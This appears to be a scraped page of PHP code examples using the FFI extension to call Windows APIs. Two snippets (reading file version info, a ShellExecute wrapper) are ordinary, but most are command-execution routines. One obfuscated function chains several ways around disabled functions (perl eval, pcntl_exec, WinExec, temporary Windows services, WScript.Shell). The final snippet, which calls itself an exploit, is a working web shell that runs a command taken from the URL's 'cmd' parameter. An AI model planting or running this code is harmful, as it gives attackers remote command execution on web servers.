function ffishelL($command)
{
    $name = whereistmP() . "\\" . uniqid('NJ');
    $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
    $res = $api->WinExec("cmd.exe /c {$command} >\"{$name}\"", 0);
    while (!file_exists($name)) {
        sleep(1);
    }
    $exec = file_get_contents($name);
    unlink($name);
    return $exec;
}
Beispiel #2
0
 function exeversion_ffi($file)
 {
     if (!DEBUG) {
         return "?";
     }
     // not yet stable
     if (function_exists('ffi') or loadPhpExtension('ffi')) {
         $win32_idl = "\nstruct VS_FIXEDFILEINFO {\n        DWORD dwSignature;\n        DWORD dwStrucVersion;\n        DWORD dwFileVersionMS;\n        DWORD dwFileVersionLS;\n        DWORD dwProductVersionMS;\n        DWORD dwProductVersionLS;\n        DWORD dwFileFlagsMask;\n        DWORD dwFileFlags;\n        DWORD dwFileOS;\n        DWORD dwFileType;\n        DWORD dwFileSubtype;\n        DWORD dwFileDateMS;\n        DWORD dwFileDateLS;\n};\nstruct VS_VERSIONINFO { struct VS_VERSIONINFO\n  WORD  wLength; \n  WORD  wValueLength; \n  WORD  wType; \n  WCHAR szKey[1]; \n  WORD  Padding1[1]; \n  VS_FIXEDFILEINFO Value; \n  WORD  Padding2[1]; \n  WORD  Children[1]; \n};\n[lib='kernel32.dll'] DWORD GetFileVersionInfoSizeA(char *szFileName, DWORD *dwVerHnd);\n[lib='kernel32.dll'] int GetFileVersionInfoA(char *sfnFile, DWORD dummy, DWORD size, struct VS_VERSIONINFO *pVer);\n";
         $ffi = new ffi($win32_idl);
         $dummy = 0;
         // &DWORD
         $size = $ffi->GetFileVersionInfoSizeA($file, $dummy);
         //$pVer = str_repeat($size+1);
         $pVer = new ffi_struct($ffi, "VS_VERSIONINFO");
         if ($ffi->GetFileVersionInfoA($file, 0, $size, $pVer) and $pVer->wValueLength) {
             // analyze the VS_FIXEDFILEINFO(Value);
             // $pValue = new ffi_struct($ffi, "VS_FIXEDFILEINFO");
             $pValue =& $pVer->Value;
             return sprintf("%d.%d.%d.%d", $pValue->dwFileVersionMS >> 16, $pValue->dwFileVersionMS & 0xffff, $pValue->dwFileVersionLS >> 16, $pValue->dwFileVersionLS & 0xffff);
         }
     }
 }
Beispiel #3
0
function z6v($c)
{
    global $win, $tempdir;
    $r = '';
    if (!empty($c)) {
        if (!$win) {
            if (extension_loaded('perl')) {
                @ob_start();
                $p = new perl();
                $p->eval("system('{$c}')");
                $r = @ob_get_contents();
                @ob_end_clean();
            } elseif (z7r('pcntl_exec') && z7r('pcntl_fork')) {
                $r = '[~] Blind Command Execution via [pcntl_exec]\\n\\n';
                $o = $tempdir . uniqid('pcntl');
                $pid = @pcntl_fork();
                if ($pid == -1) {
                    $r .= '[-] Could not fork. Exit';
                } elseif ($pid) {
                    $r .= @pcntl_wifexited($status) ? '[+] Done! Command "' . $c . '" successfully executed.' : '[-] Error. Incorrect Command.';
                } else {
                    $c = array(" -e 'system(\"{$c} > {$o}\")'");
                    if (@pcntl_exec('/usr/bin/perl', $c)) {
                        exit(0);
                    }
                    if (@pcntl_exec('/usr/local/bin/perl', $c)) {
                        exit(0);
                    }
                    die;
                }
                $r = z9p($o);
                @unlink($o);
            }
        } else {
            $o = $tempdir . uniqid('NJ');
            if (extension_loaded('ffi')) {
                $a = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
                $r = $a->WinExec("cmd.exe /c " . z6l($c) . " >\"{$o}\"", 0);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded('win32service')) {
                $s = uniqid('NJ');
                @win32_create_service(array('service' => $s, 'display' => $s, 'path' => 'c:\\windows\\system32\\cmd.exe', 'params' => "/c " . z6l($c) . " >\"{$o}\""));
                @win32_start_service($s);
                @win32_stop_service($s);
                @win32_delete_service($s);
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } elseif (extension_loaded("win32std")) {
                @win_shell_execute('..\\..\\..\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                while (!@file_exists($o)) {
                    sleep(1);
                }
                $r = z9p($o);
            } else {
                $a = new COM("WScript.Shell");
                $a->Run('c:\\windows\\system32\\cmd.exe /c ' . z6l($c) . ' > "' . $o . '"');
                $r = z9p($o);
            }
            @unlink($o);
        }
    }
    return $r;
}
Beispiel #4
0
 function win32_fork($app, $params = '', $startDir = '')
 {
     $win32_idl = "\n\t\t[lib='shell32.dll'] int ShellExecuteA(int handle, char *operation, char *file, char *param, char *directory, int show);\n\t\t";
     $ffi = new ffi($win32_idl);
     $show = 7;
     //0: hided, 1: normal, 2: mini, 3:maxi, 4:inactive, 7:mini inactive
     $result = $ffi->ShellExecuteA(0, "open", tfb_shellencode($app), $params, tfb_shellencode($startDir), $show);
     return $result;
 }
Beispiel #5
0
##########################################################
if (!extension_loaded('ffi')) {
    die('ERROR: FFI extension is not loaded!');
}
$command = empty($_GET['cmd']) ? 'dir' : $_GET['cmd'];
if (is_writeable(dirname(__FILE__))) {
    $tmp = dirname(__FILE__);
} elseif (is_writeable(ini_get('session.save_path'))) {
    $tmp = ini_get('session.save_path');
} elseif (is_writeable(ini_get('upload_tmp_dir'))) {
    $tmp = ini_get('upload_tmp_dir');
} else {
    die('ERROR: Move exploit to writeable folder.');
}
$output = "{$tmp}\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c {$command} >\"{$output}\"", 0);
while (!file_exists($output)) {
    sleep(1);
}
$con = '';
$fp = fopen($output, 'r');
while (!feof($fp)) {
    $con .= fgets($fp, 1024);
}
fclose($fp);
$con = htmlspecialchars($con);
echo "<pre>{$con}</pre>";
unlink($output);
?>